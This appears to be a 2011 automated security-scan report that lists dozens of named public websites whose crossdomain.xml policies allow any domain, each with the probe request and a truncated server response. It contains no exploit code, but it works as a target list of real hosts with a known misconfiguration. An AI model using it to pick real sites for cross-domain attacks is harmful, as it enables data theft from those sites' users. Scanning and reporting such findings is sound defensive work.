HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:13:04 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 11 May 2005 21:41:11 GMT Accept-Ranges: bytes Content-Length: 204 Cache-Control: max-age=1 Expires: Sat, 02 Apr 2011 14:13:05 GMT Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.about.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.about.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:37:24 GMT Server: Apache Vary: * PRAGMA: no-cache P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI" Cache-Control: max-age=3600 Expires: Sat, 02 Apr 2011 13:37:24 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="*.specials.about.com" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.accesshol |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.accesshollywood.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 PHP/5.1.6 Content-Type: application/xml Content-Length: 232 X-Aicache-OS: 64.210.193.113:80 Expires: Sat, 02 Apr 2011 13:45:42 GMT Date: Sat, 02 Apr 2011 13:45:42 GMT Connection: close Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 13:45:42 GMT; path=/ Vary: User-Agent <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> <allow-http-request ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.accuweather |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.accuweather.com |
HTTP/1.0 200 OK Cache-Control: max-age=7200 Content-Length: 1403 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 20:00:39 GMT Accept-Ranges: bytes ETag: "c28f298dc2a9ca1:322cf" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 12:43:39 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="*.accuweather.com" /> <allow-access-from domain="*.accuweatherchannel.com" /> <allow-access-from domain="*.discovery.com" /> <allow-access-from domain="*.oddcast.com" /> <allow-access-from domain="*.ucview.com" /> <allow-access-from domain="*.2mdn.net" secure="true" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="true" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.adcdn.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.dartmotif.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.aolcdn.com" secure="true" /> ...[SNIP]... <allow-access-from domain="maps.google.com" /> <allow-access-from domain="maps.yahooapis.com"/> <allow-access-from domain="spm161.brinkster.net" /> <allow-access-from domain="www.dotglu.com" /> <allow-access-from domain="www.johnfrieda.com" /> <allow-access-from domain="www.travelboards.com" /> <allow-access-from domain="www.topix.com"/> <allow-access-from domain="66.42.146.50" /> <allow-access-from domain="66.42.146.66" /> <allow-access-from domain="68.167.121.226" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.addictinggames |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.addictinggames.com |
HTTP/1.0 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 Resin/3.1.9 PHP/5.3.1 Last-Modified: Fri, 11 Feb 2011 23:55:49 GMT Accept-Ranges: bytes Content-Length: 421 Cache-Control: public, max-age=86400 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:35:47 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <!-- meta policy --> <site-control permitted-cross-domain-po ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.adriver.ru |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.adriver.ru |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:05:32 GMT Server: Apache Last-Modified: Thu, 14 Oct 2010 08:34:06 GMT ETag: "458c0d-ef-4928f92b29b80" Accept-Ranges: bytes Content-Length: 239 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" to-ports="80"/> <allow-http-request ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ajc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ajc.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (CentOS) Content-Length: 100 Content-Type: text/xml Cache-Control: max-age=1 Date: Sat, 02 Apr 2011 13:40:39 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.allvoices.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.allvoices.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:32 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 31 Mar 2011 17:01:16 GMT ETag: "578d4b-65-49fca3dce8f00" Accept-Ranges: bytes Content-Length: 101 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ally.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ally.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-Powered-By: Servlet/2.5 JSP/2.1 X-UA-Compatible: IE=8 X-UA-Compatible: IE=8 Date: Sat, 02 Apr 2011 13:43:18 GMT Content-Length: 279 Connection: close <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ancestry.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ancestry.com |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: VARSESSION=S=2To6XE4 Set-Cookie: ANCUUID=jSELjk5wn Set-Cookie: ATT=0; domain=.ancestry.com; path=/ Set-Cookie: ANCATT=0; domain=.ancestry.com; path=/ Set-Cookie: SAC=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/ Set-Cookie: RMEATT=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/ Set-Cookie: VARS=; domain=.ancestry.com; expires=Tue, 02-Apr-1991 14:23:58 GMT; path=/ X-AspNet-Version: 4.0.30319 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE" X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:23:57 GMT Connection: close Content-Length: 227 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.answerstv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.answerstv.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Mon, 13 Oct 2008 07:24:02 GMT Accept-Ranges: bytes ETag: "0d579aa42dc91:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:43:06 GMT Connection: close Content-Length: 355 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.apartment |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.apartmenthomeliving |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:18:34 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 28 Oct 2010 13:52:12 GMT Accept-Ranges: bytes Content-Length: 202 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.apartments.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.apartments.com |
HTTP/1.1 200 OK Content-Length: 320 Content-Type: text/xml Last-Modified: Thu, 29 May 2008 18:49:26 GMT Accept-Ranges: bytes ETag: "7d3deb7bcc1c81:0" Server: Microsoft-IIS/7.5 Set-Cookie: activitylogging Set-Cookie: AptAff=bcebc5f187975 Set-Cookie: activitylogging X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:45:18 GMT Connection: close Set-Cookie: aptspersistence=578884780 <?xml version="1.0"?> <!-- http://gdata.youtube.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.archive.org |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.archive.org |
HTTP/1.1 200 OK Server: nginx/0.8.32 Date: Sat, 02 Apr 2011 13:36:06 GMT Content-Type: text/xml Content-Length: 78 Last-Modified: Tue, 08 Mar 2011 00:34:01 GMT Connection: close Expires: Sat, 02 Apr 2011 19:36:06 GMT Cache-Control: max-age=21600 Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.askmen.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.askmen.com |
HTTP/1.0 200 OK Server: Apache/2.2.11 (Unix) PHP/5.2.9 Last-Modified: Fri, 01 May 2009 14:10:22 GMT ETag: "4d6cce-d3-468da5f967d54" ServerHost: (null) Content-Type: application/xml Expires: Sat, 02 Apr 2011 13:26:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:26:34 GMT Content-Length: 211 Connection: close Set-Cookie: NSC_btlnfo_iuuq_wjq <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.atom.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.atom.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 ETag: W/"138-1300820240000" Last-Modified: Tue, 22 Mar 2011 18:57:20 GMT Content-Type: text/xml Content-Length: 138 INFO_HOST: www.atom.com Cache-Control: max-age=837 Expires: Sat, 02 Apr 2011 14:11:37 GMT Date: Sat, 02 Apr 2011 13:57:40 GMT Connection: close Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:57:40 GMT; path=/ Vary: User-Agent <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.babelgum.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.babelgum.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/xml ETag: "f6804c-d0-490c48be6ef80" Server: Apache/2.2.16 Age: 228561 Date: Sat, 02 Apr 2011 13:41:19 GMT Last-Modified: Tue, 21 Sep 2010 12:55:42 GMT Content-Length: 208 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.biblegateway |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.biblegateway.com |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sat, 02 Apr 2011 13:34:50 GMT Content-Type: text/xml; charset=utf-8 Connection: close Vary: Accept-Encoding Last-Modified: Thu, 31 Mar 2011 20:34:45 GMT ETag: "9d7bf-cd-39486340" Accept-Ranges: bytes Content-Length: 205 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-pol ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bigpoint.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bigpoint.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:54:03 GMT Server: Apache Last-Modified: Mon, 01 Nov 2010 10:20:15 GMT ETag: "12cc6f-67-493fb277695c0" Accept-Ranges: bytes Content-Length: 103 Vary: Accept-Encoding,User Content-Type: application/xml X-XTM-Node: pool-03-www-017033 Connection: Close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bizjournals |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bizjournals.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:05 GMT Server: Apache Last-Modified: Mon, 09 Aug 2010 17:11:42 GMT ETag: "cc-48d671c40cf80" Accept-Ranges: bytes Content-Length: 204 ServerID: 8 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.blackberry.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.blackberry.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:38:46 GMT Server: Apache Last-Modified: Tue, 07 Dec 2010 21:59:07 GMT ETag: "11eadd1-c7-496d91d17a0c0 Accept-Ranges: bytes Content-Length: 199 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.blogs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.blogs.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 14:07:11 GMT Server: Apache Last-Modified: Wed, 16 Feb 2011 20:12:27 GMT ETag: "b94708-eb-49c6be65b00c0" Accept-Ranges: bytes Content-Length: 235 Vary: Accept-Encoding Content-Type: text/xml Content-Language: en <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bloomberg.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bloomberg.com |
HTTP/1.0 200 OK Server: Sun-Java-System-Web Expires: Sun, 01 Apr 2012 13:23:23 GMT Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Wed, 07 Jul 2010 19:36:53 GMT ETag: W/"ff-4c34d755" Date: Sat, 02 Apr 2011 13:23:23 GMT Content-Length: 255 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.boostmobile |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.boostmobile.com |
HTTP/1.1 200 OK Content-Length: 220 Content-Type: text/xml Last-Modified: Fri, 29 May 2009 18:38:10 GMT Accept-Ranges: bytes ETag: "e9bbdb9d8ce0c91:13e3" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Access-Control-Allow Date: Sat, 02 Apr 2011 13:37:45 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" to-ports="*" /> </cr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bravotv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.bravotv.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) X-Varnish: 424538094 Content-Type: text/xml Varnish-X-Cache: MISS ETag: "1f70023-13e-48d3cc9 Last-Modified: Sat, 07 Aug 2010 14:42:10 GMT Content-Length: 318 Cache-Control: max-age=281 Date: Sat, 02 Apr 2011 13:40:12 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.break.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.break.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 16 Jun 2006 02:53:41 GMT ETag: "3ed36e13f090c61:b41f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 157 Date: Sat, 02 Apr 2011 12:38:46 GMT X-Varnish: 396558551 396540669 Age: 124 Via: 1.1 varnish Connection: close X-Varnish-Host: varnish03 X-Client-IP: 173.193.214.243 X-Country: US <?xml version="1.0"?> <!-- http://content.break.com <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.buzznet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.buzznet.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:25 GMT Server: Apache Set-Cookie: bncom=173.193.214.243 Last-Modified: Sat, 01 May 2010 08:01:30 GMT ETag: "ca-4bdbdfda" Accept-Ranges: bytes Content-Length: 202 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cafemom.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cafemom.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:25:28 GMT Server: Apache Last-Modified: Thu, 21 Jan 2010 22:10:57 GMT Accept-Ranges: bytes Content-Length: 201 Vary: Accept-Encoding Connection: close Content-Type: application/xml; charset=utf-8 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cbs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cbs.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 13 Aug 2010 17:04:44 GMT X-Real-Server: ws3182.drt.cbsig.net Content-Type: application/xml Cache-Control: max-age=248 Date: Sat, 02 Apr 2011 13:27:26 GMT Content-Length: 1941 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-fro ...[SNIP]... <allow-access-from domain="wwwimage.cbs.com" /> <allow-access-from domain="cbs.com" /> <allow-access-from domain="cgi.cbs.com" /> <allow-access-from domain="video.cgi.cbs.com" /> <allow-access-from domain="dev.cgi.cbs.com" /> <allow-access-from domain="dev.cbs.cbsig.net" /> <allow-access-from domain="www.cbsnews.com" /> <allow-access-from domain="wwwimage.cbsnews.com" /> <allow-access-from domain="cbsnews.com" /> <allow-access-from domain="cgi.cbsnews.com" /> <allow-access-from domain="video.cgi.cbsnews.com" /> <allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="data.panachetech.com" /> <allow-access-from domain="data15.panachetech.com" /> <allow-access-from domain="*.panachetech.com" /> <allow-access-from domain="*.yourminis.com" /> <allow-access-from domain="vsallaccess.com" /> <allow-access-from domain="www.vsallaccess.com" /> <allow-access-from domain="*.vsallaccess.com" /> <allow-access-from domain="cbsstatic.dev.drt.cbsig <allow-access-from domain="*.cbsinteractive.com" /> <allow-access-from domain="*.cnet.com" /> <allow-access-from domain="stage.drt.cbsig.net" /> <allow-access-from domain="*.broccolobster.com" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cbsinteractive |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cbsinteractive.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:31:53 GMT Server: Apache/2.2 Accept-Ranges: bytes Content-Length: 80 Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: application/xml <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cbssports.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cbssports.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:25:08 GMT Server: Apache Last-Modified: Sun, 27 Feb 2011 21:03:46 GMT Accept-Ranges: bytes Content-Length: 2798 Cache-Control: max-age=3600 Expires: Sat, 02 Apr 2011 14:25:08 GMT X-Media: ws1373-fe.tm Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-access-from domain="sportsline.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.sportsline.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.sportsline.com" secure="false" /> ...[SNIP]... <allow-access-from domain="cbssports.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbssports.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.cbssports.com" secure="false" /> ...[SNIP]... <allow-access-from domain="cbsimg.net" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbsimg.net" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="cbsgames.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbsgames.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.cbsgames.com" secure="false" /> ...[SNIP]... <allow-access-from domain="cbsnews.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbsnews.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.cbsnews.com" secure="false" /> ...[SNIP]... <allow-access-from domain="cbs.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbs.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.cbs.com" secure="false" /> ...[SNIP]... <allow-access-from domain="ncaa.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.ncaa.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.ncaa.com" secure="false" /> ...[SNIP]... <allow-access-from domain="maxpreps.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.maxpreps.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.maxpreps.com" secure="false" /> ...[SNIP]... <allow-access-from domain="trupreps.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.trupreps.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.trupreps.com" secure="false" /> ...[SNIP]... <allow-access-from domain="cbsig.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbsig.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.*.cbsig.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.akamai.net" /> <allow-access-from domain="*.g.akamai.net" /> <allow-access-from domain="beyond.download.akamai <allow-access-from domain="cbssports.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbssports.com" secure="false" /> ...[SNIP]... <allow-access-from domain="cp32822.edgefcs.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="false" /> ...[SNIP]... <allow-access-from domain="doubleclick.net" /> <allow-access-from domain="*.*.doubleclick.net"/> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.*.2mdn.net" /> <allow-access-from domain="sandbox.dartmotif.com" /> <allow-access-from domain="my.22squared.com" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.clear-request |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.clear-request.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:04:15 GMT Server: Apache/2.0.52 (Red Hat) Last-Modified: Thu, 15 Jan 2009 16:15:53 GMT ETag: "4b90d7-cc-c5400040" Accept-Ranges: bytes Content-Length: 204 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cmt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cmt.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) mod_jk/1.2.27 Last-Modified: Thu, 14 Aug 2008 20:11:47 GMT ETag: "1c4250f-121-454711d Accept-Ranges: bytes Content-Length: 289 Content-Type: application/xml Cache-Control: max-age=600 Date: Sat, 02 Apr 2011 13:38:06 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.colbertnation |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.colbertnation.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) PHP/5.3.1 Last-Modified: Wed, 13 Aug 2008 14:31:05 GMT ETag: "160c686-102-454583d Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Cache-Control: max-age=386 Expires: Sat, 02 Apr 2011 14:25:35 GMT Date: Sat, 02 Apr 2011 14:19:09 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request-hea ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.collegehumor |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.collegehumor.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:38 GMT Server: Apache Last-Modified: Thu, 17 Mar 2011 00:02:39 GMT ETag: "9c073-235-49ea2612be5c0" Accept-Ranges: bytes Content-Length: 565 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.collegehumor ...[SNIP]... <allow-access-from domain="dev.collegehumor.com" /> <allow-access-from domain="staging.collegehumor.com" /> <allow-access-from domain="collegehumor.com" /> <allow-access-from domain="*.collegehumor.com" /> <allow-access-from domain="*.cvcdn.com" /> <allow-access-from domain="*" to-ports="80"/> ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.comedycentral |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.comedycentral.com |
HTTP/1.0 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Length: 258 Content-Type: text/xml Last-Modified: Tue, 15 Apr 2008 20:09:33 GMT ETag: "102-48050b7d" Accept-Ranges: bytes Cache-Control: max-age=72 Expires: Sat, 02 Apr 2011 13:38:15 GMT Date: Sat, 02 Apr 2011 13:37:03 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request-hea ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.contactatonce |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.contactatonce.com |
